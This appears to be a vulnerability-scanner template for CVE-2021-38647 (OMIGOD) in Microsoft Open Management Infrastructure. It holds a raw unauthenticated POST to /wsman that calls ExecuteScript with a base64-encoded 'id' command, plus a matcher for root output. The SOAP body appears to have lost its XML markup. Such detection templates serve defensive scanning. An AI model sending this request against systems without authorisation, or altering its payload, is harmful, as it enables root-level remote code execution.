id: CVE-2021-38647
info:
name: Microsoft Open Management Infrastructure - Remote Code Execution
author: daffainfo,xstp
severity: critical
description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges.
remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-38647
cwe-id: CWE-287
epss-score: 0.97476
epss-percentile: 0.99967
cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: azure_automation_state_configuration
tags: cve2021,cve,rce,omi,microsoft,kev
http:
- raw:
- |
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
HTTP://{{Hostname}}/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript
102400
uuid:00B60932-CC01-0005-0000-000000010000
PT1M30S
root/scx
aWQ=
0
true
matchers:
- type: word
words:
- ''
- 'uid=0(root) gid=0(root) groups=0'
condition: and
# digest: 490a00463044022075766ea7d42285a510f8cf5bbf152b2127b7ddd4e45ac1ffa62fd966e454bda302202136133cbcfdff83d89b7a884f9f17c89e4148e08ad866458c74a811d4f48201:922c64590222798bb761d5b6d8e72950